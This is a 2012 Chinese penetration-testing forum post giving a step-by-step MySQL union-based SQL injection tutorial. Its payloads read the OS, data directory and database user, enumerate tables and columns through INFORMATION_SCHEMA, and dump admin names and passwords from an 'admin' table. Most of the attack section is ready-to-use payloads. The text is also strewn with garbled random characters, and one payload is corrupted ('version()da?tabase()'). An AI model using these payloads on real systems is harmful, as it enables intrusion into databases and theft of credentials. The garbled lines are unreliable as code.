中国网络渗透测试联盟

标题: mysql常规注入 [打印本页]

作者: admin    时间: 2012-9-13 17:48
标题: mysql常规注入
本文介绍MYSQL盲注的一些语句和方法
3 {0 U! l& R9 [4 h+ C; C
" K" i# ?* I$ l( f# A学习盲注前先了解下 IFORMATION_SCHEMA 库
# v7 h# I6 q! x& d
: E( I7 r5 z8 cMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
8 J+ u2 t3 b$ w存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
9 `" y6 N( f( X6 D1.得到所有数据库名:& s* i" x9 P8 |5 x# r8 j+ U9 d
|SCHEMATA ->存储数据库名的表6 W' i& \% t" M' C' }8 c
|---字段:SCHEMA_NAME ->数据库名称$ S* Q1 R; z6 u8 [' K( t( r
6 Y0 F; Q% T: N5 A1 r- x
|TABLES ->存储表名2 F4 O# Q7 B1 i; }. P/ h
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
. x9 B7 ~" I# Y5 I9 D" l|---字段:TABLE_NAME ->存储表的表名, @  m2 L' G8 }, T5 t8 `

% C1 k  l4 s8 e7 J$ e|COLUMNS ->存储的字段名表
5 `+ J6 ^# d' \1 E9 V/ h|---字段:TABLE_SCHEMA ->该字段所属数据库名
% T& C7 h5 J- S( s0 d|---字段:TABLE_NAME ->存储所属表的名称
: C; j5 G  l+ U) [* ~% f& ^9 F8 g) W$ O* v% t, m# o6 x
|---字段:COLUMN_NAME ->该字段的名称$ U, z: A2 O5 i( i  l2 m; G2 b
$ }# f2 P- W9 J/ [

! M' l/ X9 x6 ^4 I$ W" A& ^, w: J4 E& F* n' d4 h8 |
###########################################################################9 b* l, S& ], @
; S2 I9 J8 y3 F  _
0x001 获取系统信息:$ K$ X0 Z" O: b  k/ U
; ^2 p. ?$ }5 B6 h
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*3 x! z( A$ X7 _9 D. C
7 u8 }3 M* @) b3 c  U
/*- @; N+ U/ \) J- i& B3 ?
6 Y+ M7 W( y* W+ a) X4 j
@@global.version_compile_os 获取系统版本
, C, }8 P( b& s; t% f9 }+ Z7 b3 p* t
@@datadir 数据库路径
8 p+ u4 H9 I2 I/ Qdatabase() 当前数据库名称
. _+ m1 [9 d, H- }! g/ k0x3c62723e 换行HEX值5 |0 L5 y, q9 O# z4 }5 W
. Z" ^& w0 C9 q" s# O. ~' t% ~
*/$ Q( y) K, h+ f) D8 h) k& Q' J* p8 k
1 @, K/ J( M. J2 U
# Z& `( N3 w% I  A8 M
! W% N. h. g; P4 C- F
######################################################################0 C' D0 `# @/ P) @1 ~7 V
1 e/ l# b! U4 A  V7 l1 R" g
0x002 获取表名% ~* W: C8 O3 e2 {$ S5 c

/ K, G+ }. m9 J% G! G2 Uunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*! X4 B1 `( c, T1 ^, n0 ]7 F( _

/ h! R! O/ {3 _: W9 s
) V/ X1 `8 G+ Y/ b+ p" K) w4 t. ]1 v/ j" a9 z, l  x( H2 P# _- ^) k
/*, |2 s: w: |/ A
9 j$ C( u. d# m9 d- q
0x67617264656e 为当前数据库名
: R: Y# O* e3 i& j( a1 m" r  W! t, D! m$ }% [3 p7 P/ C# j
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名2 r! H7 Z2 A4 P& K* n4 P7 S

: y* F6 B+ l; |0 }$ F2 h+ P*/
* m' U& _0 @5 C" t, P0 }( h1 H( Y" L% x5 r7 _
######################################################################
+ m3 s* U) T" E! I4 K+ h. L1 G, W( z
; d! y9 v* T/ L/ E" x$ M/ I9 y9 i
& o! e3 J9 E" Y5 `5 r/ K# v5 \4 _8 c' D4 \1 p+ Q2 X
0x003 获取字段9 ?* m; h! _& H  \$ d2 J/ c2 X, z
" N$ W; T& c7 `* H9 P& d' C
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
, x8 X8 m5 L: a5 Q
2 J0 i( @5 ^) c+ B8 j6 O/*
+ F/ I4 Q- O6 M0 |1 H# @- h3 i# |6 {- c) Y# Q8 R2 ~, K
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段% p2 R2 h% r, ~; }1 P$ q
$ l( H  y' }. ?! t' A. y5 a/ }
0x61646d696e ->选择一个表
  @4 a6 O, f1 \8 I
8 w  C6 H3 p6 _: t( ~9 e0x67617264656e ->数据库名0 S% k/ h9 A5 P  U
) j" d( u# X5 G
*/
, T* Q4 Q/ }5 L- {" ^# W9 q2 @4 ]/ c: t0 y- O
#####################################################################- b1 W$ k1 B* l

; ?, h2 i7 H% M7 v0 t; q0 W
, R6 z) S4 v% j* B
. w6 x4 A. h! Q2 A4 S0x004 获取数据4 S7 N2 b  [" q  `& u/ c

# l2 ~9 A0 T( P$ G$ \# A/ `( h9 nunion select 1,2,3
+ }0 A3 c/ D6 ^" I& r6 [,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
3 J2 {8 @8 }5 d# E1 [3 u5 `% j/ S2 W) |- [* x% n
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin( l3 T+ }8 r& [  V2 G

, K- l" ]2 a7 I6 P  @9 r8 B3 j
' D9 N) a4 J' D! K  }& }, W! `0 l6 d' ~! \
/*$ S$ {0 q0 x3 c5 X. [3 X7 T
! ^( d' ~, s2 C, q1 Z
0x3c62723e 换行符号HEX编码8 X/ k7 J+ {0 ^1 l! Z" u
. B# v% X2 |- I) v& j
group_concat 同时获得该字段所有数据
; \2 x. ]) k$ q& Q- |3 y4 p% p2 j, c3 }2 F
*/! N6 V2 E. R- B% {5 u5 r, w. L
# }2 I/ y1 I: @, D: b- x





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2